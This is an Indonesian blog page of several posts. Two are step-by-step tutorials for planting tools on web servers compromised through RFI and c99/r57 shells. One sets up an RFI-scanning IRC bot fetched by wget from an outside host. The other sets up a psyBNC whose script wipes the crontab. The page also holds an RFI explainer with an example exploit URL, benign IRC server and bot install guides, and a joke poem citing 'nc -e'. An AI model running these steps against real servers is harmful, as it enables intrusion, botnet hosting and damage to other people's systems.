Sabtu, 20 Maret 2010

Tutorial Membuat BotScan RFI

anope Ircd adalah sebuah mesin service Ircd

Saya mau menjelaskan sedikit cara mencari target/shell melalui bot scanner RFI di irc. saya anggap anda sudah mengerti sedikit mengenai command linux dan injection web. disini saya menggunakan shell c99 yg Version FeeLCoMz sebagai panduannya.
Mari Kita Mulai Tutor nya

  1. Simpan Script yang saya post di blog saya FeeLCoMz RFI Scanner kemudian setelah di simpan ambil script FeeLScaNz.txt edit admin nya, anda juga bisa langsung menggunakan milik saya
  2. Masuk ke shell anda atau c99
  3. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
  4. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
  5. wget script bot dari web saya atau dari tempat anda. saya pake contoh Yg milik saya, jadi commandnya “wget http://acuplod.110mb.com/FeeLScaNz.tar.gz”
  6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://acuplod.110mb.com/FeeLScaNz.tar.gz”
  7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, downloat aja dari http://acuplod.110mb.com/FeeLScaNz.tar.gz
  8. upload yg script FeelScaNz.txt Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl [nama file] [channel tdk pake #] [server] [port]" contoh : perl FeelScaNz.txt anaski irc.anaski.co.cc 6667
  9. Jika berhasil, di shell anda akan keluar tulisan.. dan di bot akan join ke channel anda
  10. Untuk mengetahui command yang dipakai, ketik .help
  11. Silahkan dipergunakan sebaik mungkin

    Ket :
    Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
    Tutor ini hanya berjalan pada shell yg hidup perl dan socket
    Semua command di atas tanpa tanda petik dua (”)

Semoga Berhasil

FeeLCoMz RFI Scanner

########################################
## FeeLCoMz RFI Scanner Bot v4.9 ##
## By FaTaLisTiCz_Fx ##
## © Agu-Nov 2008, FeeLCoMz Community ##
########################################

##[ KONFIGURASI URL ]##
my $fx29id = "http://Fx29ID.txt??"; #Fx29ID (Simple) / (Advanced) --> Di edit url nya
my $fx29id2 = "http://Fx29ID2.txt??"; #Fx29ID (Advanced)
--> Di edit url nya
my $fx29sh = "http://Fx29Sh??"; #Fx29Sh (Optional)
--> Di edit url nya
my $bypass = "http://google.php?"; #Google Bypasserz (Optional) 
--> Di edit url nya

##[ KONFIGURASI SOURCE ]##
my $mysite = "http://?"; #Path to Sources URL (Optional) 
--> Di edit url nya
my $spread = $mysite."http://spreed.txt"; #Fx29Spreadz (Optional) 
--> Di edit url nya
my $joomlaz = $mysite."bugz/joomla.txt"; #Joomla's Bugs List (Required for Joomla RFI Scanner)

DownLoad : [ Lengkap ]

Jumat, 19 Maret 2010

Cara membuat Unreal IRCD di Linux [ Install Unreal IRCD ]

Pertama2 silahkan download file dengan perintah :
[root@ANASKI][:~]# wget http://www.unrealircd.com/downloads/Unreal3.2.8.1.tar.gz

kemudian lakukan meng exstrak dg perintah :
[root@ANASKI][:~]# tar -zxvf Unreal3.2.8.1.tar.gz

kemudian masuk ke dalam directory :
[root@ANASKI][:~]# cd Unreal3.2.8.1

lakukan proses kompilasi paket dengan perintah :
[root@ANASKI][:~]# ./Config

Installing 17% <-- tekan enter seterusnya sampai 100% -maka ketik :
[root@ANASKI][:~]# make

proses instalasi akan berjalan, untuk menyempurnakan proses compile ircd, lanjutkan dengan menjalankan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# make install

- ok, skrg ircd udh selesai, tinggal di run,edit terlebih dahulu file unrealircd.conf - lakukan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# pico unrealircd.conf

- setelah selesai, skrg tinggal mengedit file oper.conf nya, lakukan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# pico oper.conf

- terakhir, skrg tinggal mengedit file connect.conf nya, lakukan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# pico connect.conf

nah, lakukan proses edit, bagian admin serta server yg mau di gunakan, akan lebih mudah mengedit menggunakan program winscp. -baiklah, saya anggap sudah selesai di edit, skrg tinggal menggunakan jurus run :
[root@ANASKI/Unreal3.2.8.1][:~]# ./unreal start

Install Anope IRCD Services

IRC -> Internet Relay Chat

IRC adalah singkatan dari Internet Relay Chat. Secara kasar, IRC adalah media untuk berbicara real time dengan orang lain di Internet. IRC bekerja seperti radio CB, hanya saja ente mengetikkan semuanya apa yang ingin bicarakan pada keyboard dan ente dapat berbicara dengan semua orang. ente pun dapat melihat ketikan orang lain pada layar monitor.

Internet Relay Chat diciptakan pada tahun ‘80an hasil dari penyempurnaan komunikasi antar UNIX. Ketika berkomunukasi antar dua orang atau lebih secara hampir bersamaan. IRC adalah jaringan server yang menrelai percakapan dari pengguna yang terkoneksi pada server tersebut. Jaringan IRC tersebar di seluruh dunia. Siapa saja, di mana saja, dengan mempergunakan internet koneksi dapat berpartisipasi untuk ikut.

Banyak sekali channels diskusi pada IRC. ente dapat bergabung pada diskusi setelah ente memilih nick name dan bergabung di channel. Jika ingin mencoba IRC, ente dapat download MIRC dari official sites mereka.
Untuk memulai, tahap standar adalah sebagai berikut:

Semua perintah diawali dengan tanda slash ('/')
Pertama gabung server (banyak server di dunia ini), misalnya /server irc.anaski.co.cc
Pilih nick name misal: /nick FIXEDSYS
Untuk melihat daftar channel yang ada, ketik /list
Gabung channel, misalnya /join #anaski
Bicara deh....


saya anjurkan pake yg asli aja :
mirc.com

Cara membuat Eggdrop [ Install Eggdrop ]

Eggdrop merupakan supported IRC Bot yang terbaik (menurutku), paling populer, dan paling advanced, sedangkan IRC Bot sendiri kebanyakan adalah berfungsi untuk membantu management channel IRC.Banyak macamnya sesuai fungsinya seperti Bot proteksi, Bot Game, Bot Zodiak, Bot News, Bot Cuaca, Bot Log Channel, dan sebagainya (beberapa company irc hosting di Indonesia menyediakan untuk disewa bagi yang ga mau ribet membuatnya).
Tapi bagi yang menginginkan Bot Proteksi sebetulnya disarankan buat meng-create sendiri karena bagaimana settingnya bisa disesuaikan dengan kebutuhan channel masing-masing yang jelas berbeda. Bagi pemula, sebelum membuat eggdrop atau IRC Bot perlu tau dong apa aja yang dibutuhkan. Seperti membuat kue, membuat kerajinan, dan lainnya eggdrop atau IRC Bot juga butuh sesuatu sebagai dasar adonannya
Yang dibutuhkan adalah SHELL, sebaiknya gunakan SHELL legal bisa dibeli di beberapa company irc hosting Indonesia yang melayani (cari di google aja yah :) )? setelah itu siapkan config, trus persiapkan TCL apa yang diinginkan. Misalnya ingin membuat Bot Game ya siapkan TCL Game, dan seterusnya. Nah setelah punya SHELL (yang legal, nyolong dosa tauuu !!!), siapkan putty (bisa download ke alamat..klik aja tuh kata putty nya). Gunakan Secure SHell protocol atau lebih sering disingkat SSH untuk login ke SHELL.
Selanjutnya download eggdrop1.6.19.tar.gz dari eggheads ftp trus telnet dan FTP ke SHELL. Lamgkah berikutnya adalah:

Upload eggdrop1.6.19.tar.gz via FTP, ketik tar -zxvf eggdrop1.6.19.tar.qz untuk extract filenya.
Kalau udah terextract masuk ke direktorinya dengan mengetik cd eggdrop ketik ./configure

Ketik make config (untuk compile semua modul) atau make iconfig (compile hanya modul yang dipilih)

Ketik make trus ketik lagi make install DEST=/home/name/botdir

Trusss edit config bot sesuai keterangan yg ada dalam filenya.

Cari file dengan nama eggdrop.conf, kemudian edit untuk edit bisa gunakan perintah for example, pico/nano/vi eggdrop.conf (pilih salah satu).

Kalo udah mengedit simpan file eggdrop tadi kemudian jalankan bot dengan perintah:

/eggdrop -m eggdrop.conf (nama config file)

Selanjutnya tinggal masukkan or nambahin TCL deh..

Untuk lengkapnya mengenai tutorial ini bisa dibaca di egghelp (udah lengkap banget bahkan ada TCL juga disitu). Cuma ya� kebanyakan pada males baca kesitu.. in english sih, tipe-tipe orang Indonesia kebanyakan udah males kalo liat tutorialnya in english (he he he).

Sumber: http://kill-nines.blogspot.com

Remote File Include (RFI)

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file
dari luar suatu file dalam sebuah webserver dengan tujuan script
didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik
ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan
server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat
menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS)
sehingga banyak sekali jumlah website yang rawan terhadap serangan
tipe ini.

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses
file inclusion (yang selanjutnya kita sebut dengan istilah `injeksi')
bisa terjadi dalam bahasa PHP.

° BAGAIMANA BISA TERJADI?
———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau
ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file.
Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara
benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri
dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. "/file…")
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya
terdapat variabel seperti ini:


include($my_ms["root"].'/error.php');


Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar
webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
-------------

File inclusion memiliki level resiko tinggi (High Risk) bahkan level
sangat berbahaya (Very Dangerous) karena injeksi memperkenankan
pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote
Commands Execution) terhadap server. Tindakan ini sangat membahayakan
bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses
lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa
saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information,
credit cards, etc..)
5. Dan banyak lagi...!!! Termasuk tindakan pengambilalihan server dan
ddos!

° SISTEM OPERASI APA YANG KEBAL?
------------------------------

Saya teringat permainan C&C Generals (my fave game!) saat seorang
hacker keluar dari barak. Mereka mengucapkan "NO SYSTEMS IS SAFE!".
Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi
selama mereka menggunakan server side scripting yang dapat
dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX,
FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
-------------------------

Banyak sekali portal dan komunitas white hat yang sering merilis bugs
terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan
perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit
perbaikan yang berarti terhadap CMS yang mungkin sekarang anda
gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan
hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET
/index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu
memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Gunakan firewall guna mencegah penyusupan orang-orang yang tidak
bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING
------

Artikel ini saya tulis berdasarkan apa yang saya ketahui, dan jika
terdapat kesalahan karena ketidaktahuan saya anda dapat menghubungi
saya lewat email. Pengalaman adalah guru yang terbaik untuk kita
semua. Semua bisa saja terjadi karena tidak ada pribadi yang
diciptakan sempurna. Nobody is perfect! No systems is safe!

° REFERENSI
---------

- http://net-square.com/papers/one_way/one_way.html (Very simple
haxing guides)
- www.milw0rm.com (Nice place to looking for exploits and buggy things)
- http://www.packetstormsecurity.org (Great advisory, toolz, and
exploits archives)
- www.google.com (Greatest place to ask! )
- http://www.ultrapasswords.com/ (Place to cooling down... We love
streaming vids! Yeah!)
- http://kill-nines.blogspot.com

Tutor membuat PsyBnc Injekan

mungkin anda mendapatkan target RFI dengan SAFE MODE OFF. Kenapa yg OFF? Karena fungsi-fungsi system, exec, passhthru, dan popen untuk mengeksekusi perintah shell ini aktif secara default. Nah, bagaimana cara Anda mengeksekusi perintah tsb? Yaitu dengan menggunakan injector seperti r57, c99, atau Fx29. Disana kita akan menemukan input box untuk mengetikkan perintah2 shell, biasanya berlabel “Command”, “Run Command”, “Execute Command”, atau semacam itu. Baiklah.. Langsung aja ya..

Pertama kita harus berada di direktori yg full permission, ewh.. Apa itu full permission? Yaitu direktori/folder yg mengizinkan kita utk menulis/meletakkan file didalamnya. Masih bingung? Ya udah, kita langsung aja coba direktori yg biasanya full perm/writable diantaranya /var/tmp/, /var/spool/samba/.

Disini kita menggunakan injector Fx29Sh, untuk pindah ke direktori /var/tmp/ kita tinggal mengetikkannya di input box berlabel “Directory” dan klik tombol “GO”. Skr kita udah berada di direktori /var/tmp/, lalu ketikkan perintah2 dibawah ini di Input yg berlabel “Command”.

1. wget http://channels.dal.net/nama/psy.tar.gz
2. tar -zvxf psy.tar.gz

3. cd .psy

4. ./config

contoh: ./config ANASKI 1990
ident = ANASKI
port = 1990

5. ./fuck
perintah ini akan menghapus semua crontab dan membuat crontab baru untuk psyBNC, hati-hatilah menggunakannya

6. ./run
perintah ini akan menjalankan psyBNC, set ident di mIRC sesuai diatas lalu koneklah melalui port yg telah di set pada langkah 4 diatas.

Jika muncul baris dengan pesan “Listening on port 1991?, berarti psyBNC-nya udah jalan. Kemudian kita tes koneksinya di mIRC dengan mengetikkan:

/server
Contoh: /server 127.0.0.1 ANASKI

Jika berhasil, akan muncul pesan “Welcome to psyBNC” di mIRC eloe dan ingat.. Ident/username yg pertama konek adalah admin psyBNC tsb dan password untuk konek ke psyBNC td adalah “passgue”. Untuk konek ke IRC, ketik /addserver irc.cbn.net.id:6667 dan tunggulah sampai psyBNC kita terhubung ke server IRC.

Surat Cinta Seorang Hacker

Seandainya hatimu adalah sebuah system,

maka aku akan SCAN kamu untuk mengetahui PORT mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu, tapi aku hanya berani PING di belakang ANONYMOUSE PROXY, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati WHATEVER!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan VULNERABILITIES-mu, pake PHP INJECTION, Terus aku ls -la; find / -perm 777 -type d, sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang BACKDOR “Remote Connect-Back Shell” jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di BUGTRAG untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi FIREWALL mu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada MACELINIOUS program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, …?
Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.

Sumber : www.ketawa.com